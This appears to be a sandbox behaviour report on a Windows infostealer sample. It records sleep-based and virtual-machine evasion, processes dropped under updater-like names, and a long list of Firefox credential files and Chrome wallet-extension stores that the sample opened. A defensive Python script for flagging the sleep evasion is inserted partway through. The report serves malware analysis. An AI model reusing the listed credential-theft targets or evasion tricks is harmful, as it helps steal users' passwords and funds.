Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe API coverage: 8.9 %
Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1480 Thread sleep time: -693000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -3661658s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1480 Thread sleep time: -1479000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -5016011s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 Thread sleep count: 9995 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 Thread sleep time: -2248875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_06D2B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06D62EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D7CCFD FindFirstFileExW, 0_2_06D7CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_06D2BAC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D86276 VirtualQuery,GetSystemInfo, 0_2_06D86276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000 Jump to behavior
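The sleep lines above are per-thread and come in two kinds, a sleep-time figure and, for oobeldr.exe, a sleep-call count; read together they show the pattern (many short delays rather than one long one) that defeats sandboxes which only shorten a single long sleep. The following aggregator is an added example, not part of the report: it correlates both kinds of line per (process, thread) and derives the per-call delay where a count exists. Input lines are copied from the report; the values are used exactly as printed, the thresholds are the ones in the report's own ">= -30000s" and "> 30" wording, and the per-call average is meaningful here only because 2248875 divides exactly by 9995.

```python
"""Correlate per-thread sleep report lines into one record per thread (added example)."""
import re
from collections import defaultdict

_TIME = re.compile(r"Source: (\S+) TID: (\d+) Thread sleep time: -(\d+)s")
_COUNT = re.compile(r"Source: (\S+) TID: (\d+) Thread sleep count: (\d+)")

REPORT_LINES = [  # copied from the report
    r"Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 1480 Thread sleep time: -693000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -3661658s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 1480 Thread sleep time: -1479000s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 3424 Thread sleep time: -5016011s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 Thread sleep count: 9995 > 30",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 3504 Thread sleep time: -2248875s >= -30000s",
]


def aggregate_sleeps(lines):
    """One record per (process, tid): largest reported sleep figure, number of
    sleep-time reports, call count when given, and delay per call when derivable."""
    threads = defaultdict(lambda: {"max_sleep": 0, "reports": 0, "calls": None})
    for line in lines:
        m = _TIME.search(line)
        if m:
            rec = threads[(m.group(1), int(m.group(2)))]
            rec["max_sleep"] = max(rec["max_sleep"], int(m.group(3)))
            rec["reports"] += 1
            continue
        m = _COUNT.search(line)
        if m:
            threads[(m.group(1), int(m.group(2)))]["calls"] = int(m.group(3))
    for rec in threads.values():
        rec["per_call"] = rec["max_sleep"] / rec["calls"] if rec["calls"] else None
    return dict(threads)


def flag_sleep_evasion(threads, sleep_threshold=30000, call_threshold=30):
    """Threads whose delay or call count crosses the report's thresholds, with reasons."""
    flagged = []
    for (proc, tid), rec in sorted(threads.items()):
        reasons = []
        if rec["max_sleep"] >= sleep_threshold:
            reasons.append(f"requested delay {rec['max_sleep']} >= {sleep_threshold}")
        if rec["calls"] is not None and rec["calls"] > call_threshold:
            reasons.append(f"{rec['calls']} sleep calls of about {rec['per_call']:.0f} each: "
                           "many short sleeps survive sandboxes that only skip one long sleep")
        if reasons:
            flagged.append({"process": proc, "tid": tid, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for entry in flag_sleep_evasion(aggregate_sleeps(REPORT_LINES)):
        print(entry["process"], entry["tid"])
        for reason in entry["reasons"]:
            print("   -", reason)
```

For oobeldr.exe the result is 9995 calls of about 225 each, which is the loop shape to look for when deciding whether a sample's apparent idleness is real or an evasion; in a sandbox, the countermeasure is to scale every delay call rather than cap only large ones.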
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116x
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696428
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.3698690548.00000000064C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1Ee
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,1169642865
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.3698791395.0000000001714000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_D59C8AA1
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696P
Source: file.exe Binary or memory string: :sqEMu
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2037044301.00000000016B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.4445088347.0000000006456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696428655o
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696428655o
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696428655
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2132551891.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}AW.EXE;MMC.EXE;MSHTA.EXE;RUNDLL32.EXE;WINHLP32.EXE;4DX-
Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: GNGpmTFam5reWeb Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.4443887762.0000000001699000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: file.exe, 00000000.00000003.2127388738.0000000006545000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696428
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D61780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_06D61780
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_06D4C990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D576E0 GetProcessHeap,HeapFree, 0_2_06D576E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D662B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_06D662B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D66014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06D66014
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06D6FC07
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D65D6C cpuid 0_2_06D65D6C
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_06D802FD
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06D80227
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06D75047
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_06D80121
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06D7FFF8
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_06D62CC6
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_06D7FC7F
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_06D7FC34
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_06D7FDA5
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_06D7FD1A
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_06D74ADB
Source: C:\Users\user\Desktop\file.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_06D7F988
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D6537F GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 0_2_06D6537F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_06D4C990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, type: DROPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
